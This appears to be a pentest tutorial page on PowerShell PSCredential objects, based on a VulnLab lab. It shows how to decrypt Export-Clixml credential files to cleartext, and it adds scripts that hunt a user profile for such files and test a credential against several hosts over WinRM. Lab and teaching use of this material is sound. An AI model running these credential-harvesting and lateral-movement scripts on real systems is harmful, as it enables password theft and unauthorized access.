Overview
PowerShell Credential Objects, or PSCredentials, are objects which "securely" store a username and password for a user. The username is stored in cleartext, and the password is stored in a SecureString, which is easily converted back to cleartext by anyone who can run code as the user that created it. These objects can be used to execute commands as a given user, but they can also be saved to files, allowing you to extract the underlying username/password.
Extracting Credentials from XML
PSCredentials can be exported to an XML file with the Export-Clixml commandlet, which writes the username in cleartext and the SecureString password as an encrypted hex string. On Windows that string is protected with DPAPI using the key of the user who ran Export-Clixml, so it can only be imported back (and decrypted) by the same user on the same machine; when you land a shell as that user, the file is as good as a cleartext password.
Here's an example file from the chain Lustrous on VulnLab for the local administrator on the machine LUSMS:
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">LUSMS\Administrator</S>
<SS N="Password">[SNIPPED]</SS>
</Props>
</Obj>
</Objs>
To extract the password we need to load this file as a PSCredential object with Import-Clixml, and call GetNetworkCredential() to display the password in cleartext.
# 1. Load the file as a Credential Object
$credObject = Import-Clixml -Path .\[Your XML File].xml
# 2. Display the username and password
$credObject.GetNetworkCredential() | fl
Example output:
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $credObject.GetNetworkCredential() | fl
UserName : Administrator
Password : [SNIPPED]
SecurePassword : System.Security.SecureString
Domain : LUSMS
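As an added example that is not part of the original page, the script below hunts for Clixml files that contain a serialized PSCredential and tries to recover each one, rather than importing a single known file. The search path, file filter and the Marshal-based SecureString conversion are my own choices (the page only shows GetNetworkCredential()). Because the SecureString is DPAPI-protected to the exporting user on Windows, Import-Clixml fails when run as anyone else, so each file is handled in a try/catch and the failure is reported instead of aborting the search.

```powershell
# Added example: find Export-Clixml files holding a PSCredential and try to
# recover the cleartext password from each. Assumes a Windows host where the
# current user is the one who ran Export-Clixml (the DPAPI key must match).
function Find-ClixmlCredential {
    param(
        [string]$Path   = $env:USERPROFILE,   # assumption: start in the current user's profile
        [string]$Filter = '*.xml'
    )

    Get-ChildItem -Path $Path -Filter $Filter -Recurse -File -ErrorAction SilentlyContinue |
        Where-Object {
            # Cheap pre-check: only bother with files that serialize a PSCredential
            Select-String -Path $_.FullName -Pattern 'System.Management.Automation.PSCredential' -Quiet
        } |
        ForEach-Object {
            $file = $_.FullName
            try {
                $cred = Import-Clixml -Path $file -ErrorAction Stop
                # Import-Clixml can also return arrays/hashtables; only handle a bare PSCredential here
                if ($cred -isnot [System.Management.Automation.PSCredential]) {
                    throw "Deserialized object is $($cred.GetType().Name), not PSCredential"
                }
                # Equivalent to $cred.GetNetworkCredential().Password: marshal the
                # SecureString to a BSTR, copy it out, then zero and free the buffer.
                $bstr = [Runtime.InteropServices.Marshal]::SecureStringToBSTR($cred.Password)
                try     { $plain = [Runtime.InteropServices.Marshal]::PtrToStringBSTR($bstr) }
                finally { [Runtime.InteropServices.Marshal]::ZeroFreeBSTR($bstr) }

                [pscustomobject]@{
                    File     = $file
                    UserName = $cred.UserName
                    Password = $plain
                    Status   = 'Recovered'
                }
            }
            catch {
                # Typical failure when the file was exported by another user or on
                # another machine: "Key not valid for use in specified state." (DPAPI mismatch)
                [pscustomobject]@{
                    File     = $file
                    UserName = $null
                    Password = $null
                    Status   = "Failed: $($_.Exception.Message)"
                }
            }
        }
}

# Usage: search the current user's profile and show what could be recovered
Find-ClixmlCredential | Format-Table -AutoSize
```

If a file shows up as failed with the DPAPI error, note who owns it and where it lives: re-running the same function from a shell as that user on that host is usually all that is needed.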
Creating a PSCredential
PSCredentials can be created using the Get-Credential commandlet. Usually this prompts for a password, but the prompt can be avoided by converting a plaintext password to a SecureString and building the object directly with New-Object.
# Prompts for password
$credObject = Get-Credential -credential [USERNAME]
# Doesn't prompt for password
$password = "[PASSWORD]" | ConvertTo-SecureString -AsPlainText -Force
$credObject = New-Object System.Management.Automation.PSCredential ('[USERNAME]', $password)
Using PSCredentials
PSCredentials can be passed to other commandlets to execute them as a given user. Many commandlets have a -Credential parameter which accepts a credential object.
Invoke-Command is particularly useful because it accepts a PSCredential for running a command on either the local or a remote machine. With -ComputerName it goes over PowerShell Remoting (WinRM), so the target, including localhost, must have WinRM enabled and the user must be allowed to connect.
# Running 'whoami' with a credential on localhost
Invoke-Command -ComputerName "localhost" -Credential $credObject -ScriptBlock { whoami }
# Running 'whoami' with a credential on a remote machine
Invoke-Command -ComputerName "[HOSTNAME or IP]" -Credential $credObject -ScriptBlock { whoami }
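The following is an added example that is not from the original page; it ties the creation section and this section together by building a PSCredential without a prompt and then checking, host by host, whether Invoke-Command accepts it. The function name, the host list and the placeholder password are assumptions; only Invoke-Command, ConvertTo-SecureString and New-Object are taken from the page.

```powershell
# Added example: build a PSCredential without a prompt and use it with
# Invoke-Command to see which hosts it is valid on. Hostnames and the
# password below are placeholders (assumptions), not values from the page.
function Test-PSCredentialAccess {
    param(
        [Parameter(Mandatory)] [System.Management.Automation.PSCredential]$Credential,
        [Parameter(Mandatory)] [string[]]$ComputerName
    )
    foreach ($computer in $ComputerName) {
        try {
            # -ErrorAction Stop turns WinRM and authentication failures into catchable
            # exceptions. The script block runs in a remote session, so whoami reports
            # the identity the credential maps to on that host (e.g. LUSMS\Administrator).
            $identity = Invoke-Command -ComputerName $computer -Credential $Credential `
                                       -ScriptBlock { whoami } -ErrorAction Stop
            [pscustomobject]@{ ComputerName = $computer; Success = $true;  RunningAs = $identity; Error = $null }
        }
        catch {
            # Access denied, WinRM not listening, Kerberos/NTLM failure, etc.
            [pscustomobject]@{ ComputerName = $computer; Success = $false; RunningAs = $null; Error = $_.Exception.Message }
        }
    }
}

# Build the credential without an interactive prompt (placeholder password).
$plainPassword  = 'Passw0rd!'
$securePassword = ConvertTo-SecureString $plainPassword -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('LUSMS\Administrator', $securePassword)

# Try it against localhost and a placeholder remote host.
Test-PSCredentialAccess -Credential $cred -ComputerName 'localhost', 'server01' |
    Format-Table -AutoSize
```

A Success of $false with an "Access is denied" message usually means the credential itself is wrong or not allowed to remote in; a connection or transport error means WinRM is not reachable on that host, which is a different problem from a bad password.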
Resources
Hyperlink | Info
---|---
Microsoft Learn | Export-Clixml usage.
Microsoft Learn | Get-Credential usage.